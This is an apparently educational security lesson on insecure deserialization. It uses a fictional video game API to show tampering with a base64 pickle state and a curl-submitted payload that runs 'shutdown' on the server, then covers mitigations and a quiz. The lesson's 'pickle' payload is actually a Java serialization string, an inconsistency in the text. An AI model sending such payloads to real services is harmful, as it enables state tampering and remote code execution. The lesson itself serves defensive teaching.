• Browse topics
Login

Insecure deserialization

Improper handling of serialized data containing user input

~20mins estimated

Select your ecosystem

Insecure deserialization: the basics

What is insecure deserialization?

Serialization is a mechanism to transform application data into a format suitable for transport — a byte stream. Deserialization is the opposite process, converting byte stream into application data. Insecure deserialization is a vulnerability that occurs when attacker-controlled data is deserialized by the server. In the worst case, it can lead to remote code execution.

About this lesson

In this lesson, we will demonstrate an insecure deserialization attack by hacking an API of a video game company. Then, we will dive deeper into Java deserialization, explain the concept of a gadget, and study vulnerable Java code. Finally, we will cover how to mitigate this vulnerability.

But first, let’s hack a video game!

FUN FACT

A game within a game

You discovered an arbitrary code execution bug in some software and are unsure what code to execute. We have some inspiration for you! Check out this article from a 2014 speedrunning event. The article describes how a group of clever speedrunners managed to reprogram one game into another game.

Discovering insecure deserialization vulnerabilities

Insecure deserialization in action

Hacking a web game

"Dungeons and Money" is here! Your long-time favorite game developer, GreedAndCo, has finally finished the multiplayer online game you have been waiting for since childhood. It’s 11:59pm, and you have been furiously restarting the game, hoping for the login screen to appear.

The clock strikes midnight. With excitement at its peak, you press the login button and finally start playing. But something is not right—even a level 1 rabbit is life-threatening. The game relies on microtransactions! You have to pay $10.99 for an epic sword if you want to kill rabbits. You can’t believe this—you’ve already paid big money for the game. Oh well, it’s time to put your hacker’s hat on and fix this injustice!

small-sword

Wow, this sword really is tiny. But I’m not paying to upgrade. Let’s take a look at the terminal below and see if we can make some modifications.

Understanding the API

You start by sniffing the network traffic the game sends from your machine while you play. A few minutes later, you notice that the game client does an HTTP POST to https://api.dungeonsandmoney.com/state/147983414 with the following payload:

{
"equipment":
"gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4=",
"location":
"gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LC",


}

Maybe these long strings are base64 encoded? Let’s take the equipment value and verify that! Run:

echo gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4= | base64 --decode > equip.pkl

Demo terminal

Deserializing Python objects

The output might look complex, but it was just a base64 encoded representation of a serialized Python object. To understand its contents, we need to first decode the base64 string and then deserialize it. We would decode the base64 string to a file called equip.pkl by running:

echo gASVgQAAAAAAAACMfXsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAxLCAwLCAwXX19lC4= | base64 --decode > equip.pkl

Deserializing Python objects to a human-readable format

We will be deserializing objects into a human-readable format using the following script:

Demo terminal

Changing the game state

Excellent! The serialized object represents the Equipment class. Upon closer inspection, you'll see it possesses an items field. The values of the items array are [0, 0, 1, 0, 0].

Your in-game character currently has only 1 item equipped: a level 1 sword. What do you think will happen if we change the value of the array to [0, 0, 20, 0, 0] (change 1 to 20)? Our aim is to elevate our character's capabilities by amplifying the sword's level. To achieve this, we'll be altering the value 1 (representing the level 1 sword) in the items array to 20 (indicating a level 20 sword).

Here's how the interactive component should work:

  1. Modify the items array from [0, 0, 1, 0, 0] to [0, 0, 20, 0, 0] within the deserialized Python object.
  2. Serialize the modified Python object.
  3. Convert the serialized data to a base64 encoded string for transmission or storage.

We will serialize and base64 encode the Python object to prepare it for sending to the game API using the following script:

Demo terminal

After serializing and base64 encoding we get the following output:

gASVggAAAAAAAACMfnsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAyMCwgMCwgMF19fZQu

Now we can attach this payload to the API POST request.

curl -H "Content-Type: application/json" -X POST -d '{ "equipment":"gASVggAAAAAAAACMfnsibWV0YWRhdGEiOiB7InBhY2thZ2VfbmFtZSI6ICJjb20uZHVuZ2VvbnNhbmRtb25leS5zdGF0ZSIsICJjbGFzc19uYW1lIjogIkVxdWlwbWVudCJ9LCAiZmllbGRzIjogeyJpdGVtcyI6IFswLCAwLCAyMCwgMCwgMF19fZQu" }' https://api.dungeonsandmoney.com/state/147983414

Remote code execution

You log into the game, and boom! Your level 1 sword just got upgraded to level 20. By manipulating serialized data, you managed to change the state of the game.

normal-sword

Now things are looking better! We can take on almost any enemy that comes our way. But can we take this one step further?

Observe the following code:

Explanation:

  1. EvilClass is defined with a special method __reduce__
  2. __reduce__ returns a tuple to run os.system with a specific command
  3. An instance of EvilClass is created as evil_instance
  4. evil_instance is serialized using pickle.dumps()
  5. Deserializing evil_payload using pickle.loads() executes the malicious command

You prepare the code below to generate a serialized, base64 encoded payload that will run the "shutdown" command when executed:

We should get: rO0ABXNyABFnYWRnZXQuRXZpbEdhZGdldJlTufMW09bEAgABTAAHY29tbWFuZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAIc2h1dGRvd24=

Now when we run the following, our game will change again:

curl -H "Content-Type: application/json" -X POST -d '{ "equipment": "rO0ABXNyABFnYWRnZXQuRXZpbEdhZGdldJlTufMW09bEAgABTAAHY29tbWFuZHQAEkxqYXZhL2xhbmcvU3RyaW5nO3hwdAAIc2h1dGRvd24=" }' https://api.dungeonsandmoney.com/state/147983414

Boom! Your game client crashes, and a gigantic red “Server is down” alert pops up on your screen. The shutdown command must have worked! But how?

ridiculously-large-sword

Insecure deserialization under the hood

State manipulation: a false sense of security

We saw how insecure deserialization can lead to state manipulation and remote code execution in the previous section. State manipulation can happen regardless of serialization being used or not. However, because serialized payloads are more “obscure”, developers tend to assume that serialization somehow protects them against this kind of attack. In reality, it doesn’t matter if payloads are human-readable JSON or obscure binary blobs — if the client can unexpectedly manipulate the state, the whole API needs to be redesigned.

But the truth is far from it. Whether a payload is a seemingly cryptic Base64 encoded string or a straightforward JSON object, if a malicious actor can influence its contents, the integrity of the application is at risk. Rather than relying on obscurity, it's paramount to ensure that any data - serialized or not - coming from untrusted sources is meticulously validated and sanitized. When a system is vulnerable to state manipulation from client-side data, it's a clear sign that there's a pressing need for a more secure design approach.

Remote code execution

In the worst case, deserialization vulnerabilities can lead to remote code execution. Let’s look at the EvilGadget class we used in the previous exercise.

Explanation

The __reduce__ method is used for defining custom behavior during pickling. The method returns a tuple where the first item is a callable (in this case, os.system) and the subsequent items are arguments for that callable.

When an instance of EvilPickleObject is deserialized using pickle.loads(), it will call the callable with the specified arguments, executing the malicious command.

Other serialization frameworks

Pickle

As already discussed, Python's built-in pickle module is well-known for its insecure deserialization vulnerabilities. It allows serialization and deserialization of arbitrary Python objects, leading to the potential for arbitrary code execution if a malicious payload is processed.

PyYAML

The PyYAML library is used to parse YAML documents into Python objects. In older versions of the library, the yaml.load() method was vulnerable to arbitrary code execution through crafted YAML payloads. Using the yaml.safe_load() method instead is recommended as it limits deserialization to basic Python objects.

JSON Libraries

JSON libraries in Python are generally safe from deserialization attacks because JSON does not support complex types and functions. Instead, it deals with simple data structures. However, always validate the structure of the incoming data to prevent potential issues related to unexpected data types or structures.

Scan your code & stay secure with Snyk - for FREE!

Did you know you can use Snyk for free to verify that your code
doesn't include this or other vulnerabilities?

Scan your code

Insecure deserialization mitigation

Don't deserialize untrusted data

The golden rule for avoiding insecure deserialization issues is to never deserialize data that originates from an untrusted source, such as user input.

Opt for simpler data structures

Serialization of complex data structures from untrusted sources is inherently unsafe as it can result in arbitrary code execution. Whenever possible, opt for simpler serialization formats like JSON which does not support deserializing into arbitrary objects with complex types and functions.

Use safer function alternatives

In PyYAML, the default yaml.load() can create any Python object, which poses security risks. Using yaml.safe_load() only allows simple Python data structures like lists or dictionaries.

Quiz

Test your knowledge!

Quiz

When using PyYAML library, which method should you use to limit deserialization?

Keep learning

To learn more about Insecure Deserialization, check out some other great content:

And some content by Snyk:

Congratulations

Woohoo! You've learned what the risks are of insecure deserialization. You’ve also learned how to mitigate it. Also, make sure to check out our lessons on other common vulnerabilities.